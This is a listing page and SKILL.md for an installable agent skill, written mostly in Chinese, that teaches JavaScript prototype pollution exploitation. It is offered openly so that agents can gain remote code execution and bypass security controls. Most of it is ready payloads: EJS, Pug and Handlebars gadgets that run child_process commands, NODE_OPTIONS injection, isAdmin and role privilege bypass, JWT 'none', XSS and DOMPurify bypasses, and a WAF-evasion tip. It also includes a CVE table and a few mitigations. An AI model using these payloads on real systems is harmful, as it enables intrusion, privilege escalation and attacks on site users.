prototype-pollution-exploit

Name: prototype-pollution-exploit
Author: wgpsec/AboutSecurity

$npx mdskill add wgpsec/AboutSecurity/prototype-pollution-exploit

Exploit prototype pollution to achieve remote code execution.

Enables agents to bypass security controls in Node.js applications.
Requires targets using lodash, jQuery, or deep copy functions.
Injects malicious properties via __proto__ or constructor attacks.
Delivers results by executing arbitrary server-side code.

SKILL.md

.github/skills/prototype-pollution-exploitView on GitHub ↗

---
name: prototype-pollution-exploit
description: "JavaScript 原型链污染漏洞利用方法论。当目标为 Node.js 应用、使用 lodash/jQuery/深拷贝函数、接收 JSON 输入时使用。覆盖 Server-side（RCE/权限绕过）和 Client-side（XSS/DOM 操控）两种场景"
metadata:
  tags: "prototype pollution,__proto__,constructor,javascript,nodejs,lodash,json,原型链污染,RCE,XSS"
  category: "exploit"
  mitre_attack: "T1059.007,T1190"
---

# JavaScript 原型链污染漏洞利用

> **核心原理**：通过修改 `Object.prototype`，向所有 JavaScript 对象注入恶意属性

## ⛔ 深入参考

- 服务端 RCE 利用链（child_process/EJS/Pug/Handlebars）→ [references/server-side-rce.md](references/server-side-rce.md)
- 客户端 Gadgets（jQuery/Mithril/Vue/DOMPurify 绕过）→ [references/client-side-gadgets.md](references/client-side-gadgets.md)

---

## Phase 1: 识别原型链污染点

### 1.1 常见触发模式

```
存在漏洞的代码模式：
├─ 递归合并/深拷贝: merge(target, userInput)
├─ 路径赋值: obj[a][b] = value（a/b 来自用户）
├─ lodash: _.merge / _.defaultsDeep / _.set（旧版本）
├─ jQuery: $.extend(true, {}, userInput)
└─ 自定义 deepCopy/assign 函数
```

### 1.2 测试 Payload

```json
// 方式 1: __proto__ 直接注入
{"__proto__": {"polluted": "yes"}}

// 方式 2: constructor.prototype
{"constructor": {"prototype": {"polluted": "yes"}}}

// 方式 3: 嵌套路径注入（URL 参数场景）
?__proto__[polluted]=yes
?constructor[prototype][polluted]=yes

// 方式 4: JSON 数组绕过（某些 parser 处理差异）
[{"__proto__": {"polluted": "yes"}}]
```

### 1.3 检测是否成功

```javascript
// 服务端验证（如能执行代码）
console.log({}.polluted);  // 输出 "yes" = 污染成功

// 黑盒验证：观察应用行为变化
// 例如：污染 admin=true → 获取管理员权限
```

## Phase 2: Server-side 利用（RCE 优先）

### 2.1 决策树

```
目标环境？
├─ Node.js + child_process 可触发
│   └─ 污染 shell/env/NODE_OPTIONS → RCE
├─ Node.js + 模板引擎（EJS/Pug/Handlebars）
│   └─ 污染模板编译选项 → RCE
├─ Node.js + 认证逻辑
│   └─ 污染 isAdmin/role → 权限绕过
└─ 无直接 RCE 路径
    └─ 污染配置项（DEBUG/verbose）→ 信息泄露
```

### 2.2 RCE via child_process

```json
// 污染 child_process.spawn 的默认选项
{"__proto__": {
  "shell": "node",
  "NODE_OPTIONS": "--require /proc/self/environ"
}}

// 或通过 env 注入
{"__proto__": {
  "env": {
    "NODE_OPTIONS": "--require=./malicious.js"
  },
  "shell": "/bin/bash"
}}
```

### 2.3 RCE via EJS 模板引擎

```json
// EJS 编译时会检查 opts.outputFunctionName
// 如果被污染，注入的代码会在模板编译时执行
{"__proto__": {
  "outputFunctionName": "x;process.mainModule.require('child_process').execSync('id');x"
}}

// EJS 3.x 另一向量
{"__proto__": {
  "client": true,
  "escapeFunction": "1;return process.mainModule.require('child_process').execSync('id');"
}}
```

### 2.4 RCE via Pug/Jade

```json
// Pug 模板引擎
{"__proto__": {
  "block": {
    "type": "Text",
    "val": "x]);process.mainModule.require('child_process').execSync('id');//"
  }
}}
```

### 2.5 RCE via Handlebars

```json
// Handlebars 4.x
{"__proto__": {
  "main": "\n return process.mainModule.require('child_process').execSync('id').toString();\n"
}}
```

### 2.6 权限绕过

```json
// 应用检查 user.isAdmin 或 user.role
// 如果未显式设置，会继承 prototype 的值
{"__proto__": {"isAdmin": true}}
{"__proto__": {"role": "admin"}}
{"__proto__": {"verified": true}}

// JWT 验证绕过（某些实现）
{"__proto__": {"algorithm": "none"}}
```

## Phase 3: Client-side 利用

### 3.1 XSS via DOM 属性污染

```json
// 污染 innerHTML 相关属性
{"__proto__": {"innerHTML": "<img src=x onerror=alert(1)>"}}

// 通过 URL 参数污染（某些 SPA 框架解析 query string）
?__proto__[src]=data:,alert(1)
?__proto__[onload]=alert(1)
```

### 3.2 绕过 DOMPurify/Sanitizer

```json
// 某些版本的 DOMPurify 可通过原型链污染绕过
{"__proto__": {"ALLOWED_TAGS": ["img", "script"]}}
{"__proto__": {"ADD_ATTR": ["onerror", "onload"]}}

// 或禁用清理
{"__proto__": {"RETURN_DOM": true}}
```

### 3.3 jQuery Gadget

```json
// jQuery < 3.4.0 的 $.extend 存在原型链污染
// 配合 HTML 属性注入
{"__proto__": {"class": "xss-class", "onclick": "alert(1)"}}
```

## Phase 4: 常见框架漏洞版本

| 库 | 漏洞版本 | CVE |
|----|---------|-----|
| lodash merge | < 4.17.12 | CVE-2019-10744 |
| lodash defaultsDeep | < 4.17.12 | CVE-2019-10744 |
| jQuery extend | < 3.4.0 | CVE-2019-11358 |
| minimist | < 1.2.6 | CVE-2021-44906 |
| class-transformer | < 0.3.1 | — |
| Hoek (hapi) | < 5.0.3 | CVE-2018-3728 |
| Handlebars | < 4.6.0 | CVE-2019-19919 |
| EJS | < 3.1.7 | CVE-2022-29078 |

## Phase 5: 自动化发现

```bash
# 静态扫描（源代码审计）
grep -rn "merge\|assign\|extend\|deepCopy" --include="*.js" .
grep -rn "\[.*\]\[.*\].*=" --include="*.js" .  # 动态路径赋值

# 依赖版本检查
npm audit
npm ls lodash  # 检查 lodash 版本

# 动态测试
# 在所有 JSON 输入点注入 __proto__ payload
# 观察响应变化或新属性出现
```

## ⛔ 注意事项

- Node.js 的 `--disable-proto=throw` 选项会阻止 `__proto__` 访问
- `Object.create(null)` 创建的对象无原型 → 不可污染
- ES2022 `Object.hasOwn()` 不受原型影响
- 某些 WAF 会过滤 `__proto__` → 用 `constructor.prototype` 绕过